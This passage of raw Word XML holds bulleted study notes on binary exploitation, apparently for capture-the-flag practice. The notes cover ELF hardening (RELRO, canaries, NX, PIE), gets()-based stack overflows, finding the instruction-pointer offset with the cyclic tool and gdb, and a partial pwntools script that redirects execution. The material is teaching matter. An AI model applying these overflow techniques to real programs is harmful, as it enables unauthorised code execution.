          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00756967">
        <w:t>https://www.redhat.com/en/blog/hardening-elf-binaries-using-relocation-read-only-relro</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B3C69BD" w14:textId="1B19FE4F" w:rsidR="00756967" w:rsidRDefault="00756967" w:rsidP="00756967">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Stack Canary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F3DD006" w14:textId="23F7B872" w:rsidR="00756967" w:rsidRDefault="00756967" w:rsidP="00756967">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>tokens placed after a stack to detect stack overflow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="716BC0F5" w14:textId="56444F01" w:rsidR="00756967" w:rsidRDefault="00756967" w:rsidP="00756967">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>sit beside stack in memory and is corrupted if there is an overflow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1597BBF9" w14:textId="0261C6DC" w:rsidR="00756967" w:rsidRDefault="00756967" w:rsidP="00756967">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>shuts down program before overflow can cause exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C16A42F" w14:textId="7FEA5FF4" w:rsidR="00756967" w:rsidRDefault="00756967" w:rsidP="00756967">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00756967">
        <w:t>https://www.sans.org/blog/stack-canaries-gingerly-sidestepping-the-cage/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16A344FC" w14:textId="5D70206E" w:rsidR="00756967" w:rsidRDefault="00756967" w:rsidP="00756967">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>NX</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3199017D" w14:textId="642BC9AC" w:rsidR="00756967" w:rsidRDefault="00756967" w:rsidP="00756967">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>non-executable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EE4A89E" w14:textId="74263DB1" w:rsidR="00756967" w:rsidRDefault="00756967" w:rsidP="00756967">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>if enabled, memory segments can be either writeable or executable, but not both</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A19944D" w14:textId="147EC281" w:rsidR="00756967" w:rsidRDefault="00756967" w:rsidP="00756967">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>stops attackers from injecting own malicious code (shellcode) into program</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DF89DD6" w14:textId="0DF7B9B8" w:rsidR="00756967" w:rsidRDefault="00756967" w:rsidP="00756967">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00756967">
        <w:t>https://en.wikipedia.org/wiki/Executable_space_protection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52C65A38" w14:textId="739C7925" w:rsidR="00756967" w:rsidRDefault="00756967" w:rsidP="00756967">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>PIE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54E06E36" w14:textId="14754878" w:rsidR="00756967" w:rsidRDefault="00756967" w:rsidP="00756967">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Position Independent Executable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7269EC32" w14:textId="1A39A9F4" w:rsidR="00756967" w:rsidRDefault="00756967" w:rsidP="00756967">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>loads the program dependencies into random locations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3139A9A4" w14:textId="26E6BF3C" w:rsidR="00756967" w:rsidRDefault="00756967" w:rsidP="00756967">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>attacks that rely on memory layout are more difficult to conduct</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D4323B4" w14:textId="556DDABC" w:rsidR="00756967" w:rsidRDefault="00756967" w:rsidP="00756967">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00756967">
        <w:t>https://access.redhat.com/blogs/766093/posts/1975793</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27D019CB" w14:textId="726D5402" w:rsidR="00756967" w:rsidRDefault="00756967" w:rsidP="00756967">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>RWX</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="673CB847" w14:textId="1C4EA725" w:rsidR="00756967" w:rsidRDefault="00756967" w:rsidP="00756967">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId81" w:history="1">
        <w:r w:rsidRPr="00FE632C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://blog.siphos.be/2011/07/high-level-explanation-on-some-binary-executable-security/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0BB1DBDD" w14:textId="081FB901" w:rsidR="00756967" w:rsidRDefault="00756967" w:rsidP="00756967">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Cyclic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44091EB9" w14:textId="55CE69F3" w:rsidR="00756967" w:rsidRDefault="00756967" w:rsidP="00756967">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">programs vulnerable to buffer overflow using the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>gets(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>) function</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AC36930" w14:textId="09C12B89" w:rsidR="007E2D48" w:rsidRDefault="007E2D48" w:rsidP="007E2D48">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">does not check if the user input is </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>actually in</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> bounds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52AFE988" w14:textId="3E8825CC" w:rsidR="007E2D48" w:rsidRDefault="007E2D48" w:rsidP="007E2D48">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId82" w:history="1">
        <w:r w:rsidRPr="00FE632C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://faq.cprogramming.com/cgi-bin/smartfaq.cgi?answer=1049157810&amp;id=1043284351</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="15BE963F" w14:textId="729F30B7" w:rsidR="007E2D48" w:rsidRDefault="007E2D48" w:rsidP="007E2D48">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>byte allocation that exceeds expected input size</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="601CE094" w14:textId="097D5379" w:rsidR="007E2D48" w:rsidRDefault="007E2D48" w:rsidP="007E2D48">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>overwrite instruction pointer (IP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27F7F6F7" w14:textId="6C6DD108" w:rsidR="007E2D48" w:rsidRDefault="007E2D48" w:rsidP="007E2D48">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>eip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> on 32-bit machines</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BF91611" w14:textId="50F23E0C" w:rsidR="007E2D48" w:rsidRDefault="007E2D48" w:rsidP="007E2D48">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>rip on 64-bit machines</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7843242E" w14:textId="61C978F3" w:rsidR="007E2D48" w:rsidRDefault="007E2D48" w:rsidP="007E2D48">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">redirect </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>eip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to targeted function</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0931E20A" w14:textId="157D4E81" w:rsidR="007E2D48" w:rsidRDefault="007E2D48" w:rsidP="007E2D48">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>print_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>flag</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>) for example</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03396B28" w14:textId="67C5C26E" w:rsidR="007E2D48" w:rsidRDefault="007E2D48" w:rsidP="007E2D48">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Cyclic Tool</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28C0EBD3" w14:textId="489EB2D4" w:rsidR="007E2D48" w:rsidRDefault="007E2D48" w:rsidP="007E2D48">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>overflow the stack with a pattern to see where IP is</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B3F543F" w14:textId="369BCF6D" w:rsidR="007E2D48" w:rsidRDefault="007E2D48" w:rsidP="007E2D48">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>gdb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="127157E0" w14:textId="34EC00BA" w:rsidR="007E2D48" w:rsidRDefault="007E2D48" w:rsidP="007E2D48">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>gdb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> &lt;file&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CE4B836" w14:textId="393CC853" w:rsidR="007E2D48" w:rsidRDefault="007E2D48" w:rsidP="007E2D48">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>r &lt; &lt;pattern file&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BDDFD61" w14:textId="383440BA" w:rsidR="007E2D48" w:rsidRDefault="007E2D48" w:rsidP="007E2D48">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>this will cause a segmentation fault and observe an invalid address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47A3E0C2" w14:textId="6CA68FB0" w:rsidR="007E2D48" w:rsidRDefault="007E2D48" w:rsidP="007E2D48">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>view values at each register</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CE33684" w14:textId="52299C56" w:rsidR="007E2D48" w:rsidRDefault="007E2D48" w:rsidP="007E2D48">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>eip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="215F5E72" w14:textId="20564BD0" w:rsidR="007E2D48" w:rsidRDefault="007E2D48" w:rsidP="007E2D48">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>use cyclic tool to create a file that can be used to cause an overflow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29A72AB4" w14:textId="730DF2C4" w:rsidR="007E2D48" w:rsidRDefault="007E2D48" w:rsidP="007E2D48">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>cyclic 100</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79273685" w14:textId="6B824617" w:rsidR="007E2D48" w:rsidRDefault="007E2D48" w:rsidP="007E2D48">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>random pattern of 100 characters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FC7E3ED" w14:textId="4E8AB7BB" w:rsidR="007E2D48" w:rsidRDefault="007E2D48" w:rsidP="007E2D48">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>cyclic 100 &gt; pattern</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AB76424" w14:textId="78C5C616" w:rsidR="007E2D48" w:rsidRDefault="007E2D48" w:rsidP="007E2D48">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">creates a file of said characters to use in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>gbd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="564D3493" w14:textId="36294443" w:rsidR="007E2D48" w:rsidRDefault="007E2D48" w:rsidP="007E2D48">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Pwn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Scripting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FD79198" w14:textId="77777777" w:rsidR="007E2D48" w:rsidRDefault="007E2D48" w:rsidP="007E2D48">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pwn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> import *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BF94D61" w14:textId="77777777" w:rsidR="007E2D48" w:rsidRDefault="007E2D48" w:rsidP="007E2D48">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="261A8849" w14:textId="77777777" w:rsidR="007E2D48" w:rsidRDefault="007E2D48" w:rsidP="007E2D48">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>padding = cyclic(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cyclic_find</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>('</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>jaaa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>'))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62EB30B5" w14:textId="77777777" w:rsidR="007E2D48" w:rsidRDefault="007E2D48" w:rsidP="007E2D48">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73B887F0" w14:textId="77777777" w:rsidR="007E2D48" w:rsidRDefault="007E2D48" w:rsidP="007E2D48">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>eip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = p32(0xdeadbeef)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0943E984" w14:textId="77777777" w:rsidR="007E2D48" w:rsidRDefault="007E2D48" w:rsidP="007E2D48">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D623304" w14:textId="77777777" w:rsidR="007E2D48" w:rsidRDefault="007E2D48" w:rsidP="007E2D48">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
